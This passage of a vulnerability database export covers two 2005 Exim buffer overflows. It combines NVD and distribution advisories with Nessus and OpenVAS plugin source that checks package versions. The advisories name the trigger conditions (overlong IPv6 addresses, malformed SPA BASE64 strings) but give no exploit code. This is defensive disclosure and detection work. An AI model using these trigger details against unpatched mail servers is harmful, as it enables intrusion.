script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"exim<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-ldap<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-ldap2<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-mysql<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-postgresql<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-sa-exim<4.43+28_1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "naslFamily": "FreeBSD Local Security Checks", "pluginID": "19118", "cpe": ["p-cpe:/a:freebsd:freebsd:exim-ldap", "cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:exim-ldap2", "p-cpe:/a:freebsd:freebsd:exim-postgresql", "p-cpe:/a:freebsd:freebsd:exim-mysql", "p-cpe:/a:freebsd:freebsd:exim-sa-exim", "p-cpe:/a:freebsd:freebsd:exim"], "scheme": null}
{"cve": [{"lastseen": "2017-10-11T11:06:07", "bulletinFamily": "NVD", "description": "Buffer overflow in the spa_base64_to_bits function in Exim before 4.43, as originally obtained from Samba code, and as called by the auth_spa_client function, may allow attackers to execute arbitrary code during SPA authentication.", "modified": "2017-10-10T21:29:48", "published": "2005-05-02T00:00:00", "id": "CVE-2005-0022", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0022", "title": "CVE-2005-0022", "type": "cve", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-10-11T11:06:07", "bulletinFamily": "NVD", "description": "Multiple buffer overflows in Exim before 4.43 may allow attackers to execute arbitrary code via (1) an IPv6 address with more than 8 components, as demonstrated using the -be command line option, which triggers an overflow in the host_aton function, or (2) the -bh command line option or dnsdb PTR lookup, which triggers an overflow in the dns_build_reverse function.", "modified": "2017-10-10T21:29:48", "published": "2005-05-02T00:00:00", "id": "CVE-2005-0021", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0021", "title": "CVE-2005-0021", "type": "cve", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2018-08-31T00:09:43", "bulletinFamily": "unix", "description": "A flaw has been found in the host_aton() function, which can overflow a buffer if it is presented with an illegal IPv6 address that has more than 8 components. When supplying certain command line parameters, the input was not checked, so that a local attacker could possibly exploit the buffer overflow to run arbitrary code with the privileges of the Exim mail server. (CAN-2005-0021)\n\nAdditionally, the BASE64 decoder in the SPA authentication handler did not check the size of its output buffer. 
By sending an invalid BASE64 authentication string, a remote attacker could overflow the buffer, which could possibly be exploited to run arbitrary code with the privileges of the Exim mail server. (CAN-2005-0022)", "modified": "2005-01-07T00:00:00", "published": "2005-01-07T00:00:00", "id": "USN-56-1", "href": "https://usn.ubuntu.com/56-1/", "title": "exim4 vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "freebsd": [{"lastseen": "2018-08-31T01:16:04", "bulletinFamily": "unix", "description": "\n1. The function host_aton() can overflow a buffer\n\t if it is presented with an illegal IPv6 address\n\t that has more than 8 components.\n2. The second report described a buffer overflow\n\t in the function spa_base64_to_bits(), which is part\n\t of the code for SPA authentication.\n", "modified": "2005-01-18T00:00:00", "published": "2005-01-05T00:00:00", "id": "CA9CE879-5EBB-11D9-A01C-0050569F0001", "href": "https://vuxml.freebsd.org/freebsd/ca9ce879-5ebb-11d9-a01c-0050569f0001.html", "title": "exim -- two buffer overflow vulnerabilities", "type": "freebsd", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2017-07-24T12:49:57", "bulletinFamily": "scanner", "description": "The remote host is missing updates announced in\nadvisory GLSA 200501-23.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=54809", "id": "OPENVAS:54809", "title": "Gentoo Security Advisory GLSA 200501-23 (exim)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Buffer overflow vulnerabilities, which could lead to arbitrary code\nexecution, have been found in the handling of IPv6 addresses as well as in\nthe SPA authentication mechanism in Exim.\";\ntag_solution = \"All Exim users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=mail-mta/exim-4.43-r2'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200501-23\nhttp://bugs.gentoo.org/show_bug.cgi?id=76893\nhttp://www.exim.org/mail-archives/exim-announce/2005/msg00000.html\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200501-23.\";\n\n \n\nif(description)\n{\n script_id(54809);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2005-0021\", \"CVE-2005-0022\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory 
GLSA 200501-23 (exim)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"mail-mta/exim\", unaffected: make_list(\"ge 4.43-r2\"), vulnerable: make_list(\"lt 4.43-r2\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:10:24", "bulletinFamily": "scanner", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-09-16T00:00:00", "published": "2008-09-04T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=52252", "id": "OPENVAS:52252", "title": "exim -- two buffer overflow vulnerabilities", "type": "openvas", "sourceData": "#\n#VID ca9ce879-5ebb-11d9-a01c-0050569f0001\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n exim\n exim-ldap\n exim-ldap2\n exim-mysql\n exim-postgresql\n exim-sa-exim\n\nCVE-2005-0021\nMultiple buffer overflows in Exim before 4.43 may allow attackers to\nexecute arbitrary code via (1) an IPv6 address with more than 8\ncomponents, as demonstrated using the -be command line option, which\ntriggers an overflow in the host_aton function, or (2) the -bh command\nline option or dnsdb PTR lookup, which triggers an overflow in the\ndns_build_reverse function.\n\nCVE-2005-0022\nBuffer overflow in the spa_base64_to_bits function in Exim before\n4.43, as originally obtained from Samba code, and as called by the\nauth_spa_client function, may allow attackers to execute arbitrary\ncode during SPA authentication.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://www.exim.org/mail-archives/exim-announce/2005/msg00000.html\nhttp://marc.theaimsgroup.com/?l=bugtraq&m=110573573800377\nhttp://www.vuxml.org/freebsd/ca9ce879-5ebb-11d9-a01c-0050569f0001.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in 
the referenced advisory.\";\n\n\nif(description)\n{\n script_id(52252);\n script_version(\"$Revision: 4078 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-16 07:34:17 +0200 (Fri, 16 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_cve_id(\"CVE-2005-0021\", \"CVE-2005-0022\");\n script_bugtraq_id(12185,12188,12268);\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"exim -- two buffer overflow vulnerabilities\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"exim\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.43+28_1\")<0) {\n txt += 'Package exim version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"exim-ldap\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.43+28_1\")<0) {\n txt += 'Package exim-ldap version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"exim-ldap2\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.43+28_1\")<0) {\n txt += 'Package exim-ldap2 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"exim-mysql\");\nif(!isnull(bver) && revcomp(a:bver, 
b:\"4.43+28_1\")<0) {\n txt += 'Package exim-mysql version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"exim-postgresql\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.43+28_1\")<0) {\n txt += 'Package exim-postgresql version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"exim-sa-exim\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.43+28_1\")<0) {\n txt += 'Package exim-sa-exim version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:21", "bulletinFamily": "scanner", "description": "The remote host is missing an update to exim\nannounced via advisory DSA 635-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=53472", "id": "OPENVAS:53472", "title": "Debian Security Advisory DSA 635-1 (exim)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_635_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 635-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Philip Hazel announced a buffer overflow in the host_aton function in\nexim, the default mail-tranport-agent in Debian, which can lead to the\nexecution of arbitrary code via an illegal IPv6 address.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 3.35-1woody4.\n\nFor the unstable distribution (sid) this problem has been fixed in\nversion 3.36-13 of exim and 4.34-10 of exim4.\n\nWe recommend that you upgrade your exim and exim4 packages.\";\ntag_summary = \"The remote host is missing an update to exim\nannounced via advisory DSA 635-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20635-1\";\n\nif(description)\n{\n script_id(53472);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:56:38 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2005-0021\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 635-1 (exim)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"exim\", ver:\"3.35-1woody4\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"eximon\", ver:\"3.35-1woody4\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:23", "bulletinFamily": "scanner", "description": "The remote host is missing an update to exim-tls\nannounced via advisory DSA 637-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=53474", "id": "OPENVAS:53474", "title": "Debian Security Advisory DSA 637-1 (exim-tls)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_637_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 637-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Philip Hazel announced a buffer overflow in the host_aton function in\nexim-tls, the SSL-enabled version of the default mail-tranport-agent\nin Debian, which can lead to the execution of arbitrary code via an\nillegal IPv6 address.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 3.35-3woody3.\n\nIn the unstable distribution (sid) this package does not exist\nanymore.\n\nWe recommend that you upgrade your exim-tls package.\";\ntag_summary = \"The remote host is missing an update to exim-tls\nannounced via advisory DSA 637-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20637-1\";\n\nif(description)\n{\n script_id(53474);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:56:38 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2005-0021\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security 
Advisory DSA 637-1 (exim-tls)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"exim-tls\", ver:\"3.35-3woody3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-02-21T01:08:57", "bulletinFamily": "scanner", "description": "A flaw has been found in the host_aton() function, which can overflow a buffer if it is presented with an illegal IPv6 address that has more than 8 components. When supplying certain command line parameters, the input was not checked, so that a local attacker could possibly exploit the buffer overflow to run arbitrary code with the privileges of the Exim mail server. (CAN-2005-0021)\n\nAdditionally, the BASE64 decoder in the SPA authentication handler did not check the size of its output buffer. By sending an invalid BASE64 authentication string, a remote attacker could overflow the buffer, which could possibly be exploited to run arbitrary code with the privileges of the Exim mail server. 
(CAN-2005-0022).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-07-19T00:00:00", "id": "UBUNTU_USN-56-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=20674", "published": "2006-01-15T00:00:00", "title": "Ubuntu 4.10 : exim4 vulnerabilities (USN-56-1)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-56-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(20674);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/07/19 23:44:03\");\n\n script_cve_id(\"CVE-2005-0021\", \"CVE-2005-0022\");\n script_xref(name:\"USN\", value:\"56-1\");\n\n script_name(english:\"Ubuntu 4.10 : exim4 vulnerabilities (USN-56-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A flaw has been found in the host_aton() function, which can overflow\na buffer if it is presented with an illegal IPv6 address that has more\nthan 8 components. When supplying certain command line parameters, the\ninput was not checked, so that a local attacker could possibly exploit\nthe buffer overflow to run arbitrary code with the privileges of the\nExim mail server. (CAN-2005-0021)\n\nAdditionally, the BASE64 decoder in the SPA authentication handler did\nnot check the size of its output buffer. 
By sending an invalid BASE64\nauthentication string, a remote attacker could overflow the buffer,\nwhich could possibly be exploited to run arbitrary code with the\nprivileges of the Exim mail server. (CAN-2005-0022).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-config\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-heavy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-light\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:eximon4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:4.10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/01/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/01/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2005-2018 Canonical, Inc. 
/ NASL script (C) 2006-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(4\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 4.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"4.10\", pkgname:\"exim4\", pkgver:\"4.34-5ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"exim4-base\", pkgver:\"4.34-5ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"exim4-config\", pkgver:\"4.34-5ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"exim4-daemon-heavy\", pkgver:\"4.34-5ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"exim4-daemon-light\", pkgver:\"4.34-5ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"eximon4\", pkgver:\"4.34-5ubuntu1.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim4 / exim4-base / exim4-config / exim4-daemon-heavy / etc\");\n}\n", "cvss": {"score": 7.2, "vector": 
"AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:08:19", "bulletinFamily": "scanner", "description": "The remote host is running Exim, a message transfer agent (SMTP).\n\nIt is reported that Exim is prone to an IPv6 Address and an SPA authentication buffer overflow. An attacker, exploiting this issue, may be able to execute arbitrary code on the remote host.\n\nExim must be configured with SPA Authentication or with IPv6 support to exploit those flaws.\n\nIn addition, Exim is vulnerable to two local overflows in command line option handling. However, Nessus has not tested for these.", "modified": "2018-07-10T00:00:00", "id": "EXIM_SPA_IPV6_OVERFLOW.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=16111", "published": "2005-01-07T00:00:00", "title": "Exim < 4.44 Multiple Overflows", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(16111);\n script_version(\"1.17\");\n script_cvs_date(\"Date: 2018/07/10 14:27:33\");\n\n script_cve_id(\"CVE-2005-0021\", \"CVE-2005-0022\");\n script_bugtraq_id(12185,12188);\n\n script_name(english:\"Exim < 4.44 Multiple Overflows\");\n script_summary(english:\"Exim Illegal IPv6 Address and SPA Authentication Buffer Overflow Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote mail server is vulnerable to a buffer overflow attack.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running Exim, a message transfer agent (SMTP).\n\nIt is reported that Exim is prone to an IPv6 Address and an SPA\nauthentication buffer overflow. An attacker, exploiting this issue,\nmay be able to execute arbitrary code on the remote host.\n\nExim must be configured with SPA Authentication or with IPv6 support\nto exploit those flaws.\n\nIn addition, Exim is vulnerable to two local overflows in command line\noption handling. 
